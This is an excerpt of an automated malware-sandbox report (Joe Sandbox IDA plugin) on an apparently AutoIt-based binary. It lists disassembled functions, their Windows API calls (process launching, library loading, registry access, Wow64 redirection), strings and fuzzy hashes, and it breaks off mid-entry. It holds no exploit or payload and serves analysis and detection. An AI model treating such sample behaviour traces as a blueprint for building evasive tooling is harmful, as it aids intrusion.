Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 215ca75715a18138f10ace5cb9f4a5a701e295357da0b1e6a4154fcd4d683092
Instruction ID: f30185df724a8abb556281d5a5921e0c74d77a3f6923c86d3c66038131366f14
Opcode Fuzzy Hash: 215ca75715a18138f10ace5cb9f4a5a701e295357da0b1e6a4154fcd4d683092
Instruction Fuzzy Hash: C7E0E536014501BBDB115FA1ED4DB4EBF39FF49B22B208620F22581874CB329432DF50

Function 00BFC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B97620: _wcslen.LIBCMT ref: 00B97625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BFC6EE
_wcslen.LIBCMT ref: 00BFC735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BFC79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00BFC7CA

Strings

0, xrefs: 00BFC6AF

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 6ce99e5198db0e7415c4f70d23a913eedde88b6ebd2ba8cd22e7b50260d42565
Instruction ID: cd68173f7f2b7773d6baa7fb5c5c58513365d290a11e4f29ffb756bc781d9992
Opcode Fuzzy Hash: 6ce99e5198db0e7415c4f70d23a913eedde88b6ebd2ba8cd22e7b50260d42565
Instruction Fuzzy Hash: E851D17160830D9BD725AF28CA85B7B7BE4EF85310F0809A9FA95D3190DB70DD88CB52

Function 00C1AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00C1AEA3

Part of subcall function 00B97620: _wcslen.LIBCMT ref: 00B97625

GetProcessId.KERNEL32(00000000), ref: 00C1AF38
CloseHandle.KERNEL32(00000000), ref: 00C1AF67

Strings

@, xrefs: 00C1AE72
<, xrefs: 00C1AE6B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: c437d29dc92346f444787fdf5bb94af20803e8f0651f8cbb76cf3bea1b6b409e
Instruction ID: 4cf50e851cb2458a07a82eea78ce704dfb1a96d9f5ed270653a1ded2915546a1
Opcode Fuzzy Hash: c437d29dc92346f444787fdf5bb94af20803e8f0651f8cbb76cf3bea1b6b409e
Instruction Fuzzy Hash: 62714A71A00615DFCF14DF54C494A9EBBF0EF09314F0584A9E81AAB3A1CB74ED85CB91

Function 00BF719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BF7206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00BF723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00BF724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BF72CF

Strings

DllGetClassObject, xrefs: 00BF7242

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: f709ce333cde6dceff513b3ca79fa718eda60bedafcaf5f8c7b738bd2cfc20a1
Instruction ID: 19f0f423d865d3c50a047b24561a98619f1c5f41d77770548acaf4745fa9ba10
Opcode Fuzzy Hash: f709ce333cde6dceff513b3ca79fa718eda60bedafcaf5f8c7b738bd2cfc20a1
Instruction Fuzzy Hash: 1E415E71644208AFDF15CF54C885BAA7BE9EF45310F1480EDBE059F24ADBB1D949CBA0

Function 00C23D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C23E35
IsMenu.USER32(?), ref: 00C23E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C23E92
DrawMenuBar.USER32 ref: 00C23EA5

Strings

0, xrefs: 00C23D89

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 19762c7c9396255efb15b3846248e92ce522da64dede7d8e839256aaacb768fc
Instruction ID: 703c5d4e3618da7f79a65c81e998263a49b6b48b88a325d3b8a6f2522708a334
Opcode Fuzzy Hash: 19762c7c9396255efb15b3846248e92ce522da64dede7d8e839256aaacb768fc
Instruction Fuzzy Hash: 3A418875A10259AFDB20DF50E884AAEBBB9FF49350F054029E911A7650C334EE09CFA0

Function 00BF1DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

Part of subcall function 00BF3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00BF3CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00BF1E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00BF1E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00BF1EA9

Part of subcall function 00B96B57: _wcslen.LIBCMT ref: 00B96B6A

Strings

ComboBox, xrefs: 00BF1DF0
ListBox, xrefs: 00BF1E25

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: bd623bf12ecf60726182cc64f598862d1f2d5bc2198a73c5fd388479ed8e0f81
Instruction ID: 23b1e8b5dfc63050abeb8457ea8ac987c636bd8aa909826db4fa8e4423c6feb6
Opcode Fuzzy Hash: bd623bf12ecf60726182cc64f598862d1f2d5bc2198a73c5fd388479ed8e0f81
Instruction Fuzzy Hash: 7F210271A00108FADB14ABA9DC96DFFB7F8DF46350B1049A9F925A71E1DB34490E8620

Function 00C22F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C22F8D
LoadLibraryW.KERNEL32(?), ref: 00C22F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C22FA9
DestroyWindow.USER32(?), ref: 00C22FB1

Strings

SysAnimate32, xrefs: 00C22F68

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 562357211f0df5fe8258aa84aafb7d459fb71e1e302bcd2c364db6ffe47de686
Instruction ID: 72c33bae49533ad4aa91249fa5acc5374609e3355029fddf6327a64cf2a7d2cf
Opcode Fuzzy Hash: 562357211f0df5fe8258aa84aafb7d459fb71e1e302bcd2c364db6ffe47de686
Instruction Fuzzy Hash: 2521AE71200225BBEB208FA4ED80FBB37B9EB59364F100228F960D2990D771DC919760

Function 00BB4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BB4D1E,00BC28E9,?,00BB4CBE,00BC28E9,00C588B8,0000000C,00BB4E15,00BC28E9,00000002), ref: 00BB4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BB4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00BB4D1E,00BC28E9,?,00BB4CBE,00BC28E9,00C588B8,0000000C,00BB4E15,00BC28E9,00000002,00000000), ref: 00BB4DC3

Strings

mscoree.dll, xrefs: 00BB4D86
CorExitProcess, xrefs: 00BB4D98

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 095c23f637f67b7161effc6f8b426570f658db54afc54d834b2bfae54108b28b
Instruction ID: 813cb9c81a0e9a7e0ae3d8f03cd90024db8a34dd1dd4ec57bffbd30ec8ae0550
Opcode Fuzzy Hash: 095c23f637f67b7161effc6f8b426570f658db54afc54d834b2bfae54108b28b
Instruction Fuzzy Hash: 5FF06235A50308BBDB219F90DC89BEEBFF5EF44752F0000A4F805A26A1CBB05D51CB90

Function 00B94E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B94EDD,?,00C61418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B94E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B94EAE
FreeLibrary.KERNEL32(00000000,?,?,00B94EDD,?,00C61418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B94EC0

Strings

kernel32.dll, xrefs: 00B94E94
Wow64DisableWow64FsRedirection, xrefs: 00B94EA8

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 70ce6a1f1eb83949d6d04f815638156138d71d13ea7c5884532f29c0f47ba2b5
Instruction ID: f671a451980ef58848b903b29a7b730cbcc9a7571fa16567e815428e4043c5a4
Opcode Fuzzy Hash: 70ce6a1f1eb83949d6d04f815638156138d71d13ea7c5884532f29c0f47ba2b5
Instruction Fuzzy Hash: 3BE0CD36A11D325BD63117257C59F6F6594EF81F637050175FC01D2500DB60CD0380E0

Function 00B94E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BD3CDE,?,00C61418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B94E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B94E74
FreeLibrary.KERNEL32(00000000,?,?,00BD3CDE,?,00C61418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B94E87

Strings

kernel32.dll, xrefs: 00B94E5B
Wow64RevertWow64FsRedirection, xrefs: 00B94E6E

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 6faf1a1fdc5a3f58effc16e5b60adcbe8750cb58fc54da0a3ad33887cac7b1ea
Instruction ID: b9826a68d28b59c8b2d319595b60e7cc30b4f9318609b219767e727ac94e1dac
Opcode Fuzzy Hash: 6faf1a1fdc5a3f58effc16e5b60adcbe8750cb58fc54da0a3ad33887cac7b1ea
Instruction Fuzzy Hash: 82D0C236922E31574A321B247C09F8F2A58EF85B513050170BC00A2210CF20CD13C1D0

Function 00C1A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00C1A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C1A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C1A468
CloseHandle.KERNEL32(?), ref: 00C1A63D

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 1638667bf0f42d3ceafc819d84fff381af13d06151017661848a7e8488cd92c0
Instruction ID: d8600ab9f25b81dc5f19deb11fb99cae21e429514ee07b2f9d5ad69480b4612b
Opcode Fuzzy Hash: 1638667bf0f42d3ceafc819d84fff381af13d06151017661848a7e8488cd92c0
Instruction Fuzzy Hash: 26A1A1716043009FD720DF24D886F2ABBE5AF88714F14885DF56A9B392DBB0ED45CB92

Function 00BCBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C33700), ref: 00BCBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00C6121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00BCBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00C61270,000000FF,?,0000003F,00000000,?), ref: 00BCBC36
_free.LIBCMT ref: 00BCBB7F

Part of subcall function 00BC29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCD7D1,00000000,00000000,00000000,00000000,?,00BCD7F8,00000000,00000007,00000000,?,00BCDBF5,00000000), ref: 00BC29DE
Part of subcall function 00BC29C8: GetLastError.KERNEL32(00000000,?,00BCD7D1,00000000,00000000,00000000,00000000,?,00BCD7F8,00000000,00000007,00000000,?,00BCDBF5,00000000,00000000), ref: 00BC29F0

_free.LIBCMT ref: 00BCBD4B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: d806bdeda2cb8d46ccf0dec27a403304c6f1b62da24355ff3b4dcc3381f81254
Instruction ID: ffde944e15b7e89ff741410eeda699cfede2da8afa4dbbbb860283ab1f223c1d
Opcode Fuzzy Hash: d806bdeda2cb8d46ccf0dec27a403304c6f1b62da24355ff3b4dcc3381f81254
Instruction Fuzzy Hash: 9A51B671900209AFCB24EF659C82FAEB7F8EB41361F1442EEE555E7191EB705E418B50

Function 00BFE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BFCF22,?), ref: 00BFDDFD

Part of subcall function 00BFDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BFCF22,?), ref: 00BFDE16

Part of subcall function 00BFE199: GetFileAttributesW.KERNEL32(?,00BFCF95), ref: 00BFE19A

lstrcmpiW.KERNEL32(?,?), ref: 00BFE473
MoveFileW.KERNEL32(?,?), ref: 00BFE4AC
_wcslen.LIBCMT ref: 00BFE5EB
_wcslen.LIBCMT ref: 00BFE603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00BFE650

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 5c07b58b9964cf3d5c615950ee345cfd4ab4c927a873907522300041b3f60b77
Instruction ID: e43cc86932e6f35a9851561b51c66268679d44d7995c136bcf27b5959c3324ce
Opcode Fuzzy Hash: 5c07b58b9964cf3d5c615950ee345cfd4ab4c927a873907522300041b3f60b77
Instruction Fuzzy Hash: D35131B24083499BC764EB94DC819FFB3ECAF84340F00496EF69993151EE74E68C8766

Function 00C1B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

Part of subcall function 00C1C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C1B6AE,?,?), ref: 00C1C9B5
Part of subcall function 00C1C998: _wcslen.LIBCMT ref: 00C1C9F1
Part of subcall function 00C1C998: _wcslen.LIBCMT ref: 00C1CA68
Part of subcall function 00C1C998: _wcslen.LIBCMT ref: 00C1CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C1BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C1BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C1BB63
RegCloseKey.ADVAPI32(?,?), ref: 00C1BBA6
RegCloseKey.ADVAPI32(00000000), ref: 00C1BBB3

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 82080a4930e0cabc0f02a4bb79dc688f5742e41dd60fbcf6833ad39c2802c7db
Instruction ID: 256a23bee890582c35861b0e9dbbc63c427f15cde037144de9b8fc415f9fcb7d
Opcode Fuzzy Hash: 82080a4930e0cabc0f02a4bb79dc688f5742e41dd60fbcf6833ad39c2802c7db
Instruction Fuzzy Hash: 87619131218241AFD714DF24C490E6ABBE5FF85308F1485ACF4994B2A2DB31ED85DF92

Function 00BF8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00BF8BCD
VariantClear.OLEAUT32 ref: 00BF8C3E
VariantClear.OLEAUT32 ref: 00BF8C9D
VariantClear.OLEAUT32(?), ref: 00BF8D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00BF8D3B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 46bfa9d6b67ee13885cdb3ef799e6af85338e1045f8b327aa472f108aaf26504
Instruction ID: 9fc64197d37410ed28de17941d628cde535efe9a76c375d234817db64f3602eb
Opcode Fuzzy Hash: 46bfa9d6b67ee13885cdb3ef799e6af85338e1045f8b327aa472f108aaf26504
Instruction Fuzzy Hash: 38517BB5A00619EFCB10CF68C884AAAB7F9FF89310B158569F909DB354E730E911CF90

Function 00C08AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C08BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C08BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C08C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C08C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C08C5F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: ccd62da843ea19fb4705531de575068d5d458d416395d8cbc0516228bbbcb805
Instruction ID: 55109982c7a77c32b959512d0c111949bc7bd9a2526d3989bd6b33e8a27ed334
Opcode Fuzzy Hash: ccd62da843ea19fb4705531de575068d5d458d416395d8cbc0516228bbbcb805
Instruction Fuzzy Hash: 94512635A10215AFDF11DF64C880A6DBBF5EF49314F09C0A8E849AB3A2DB31ED55CB90

Function 00C18EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C18F40
GetProcAddress.KERNEL32(00000000,?), ref: 00C18FD0
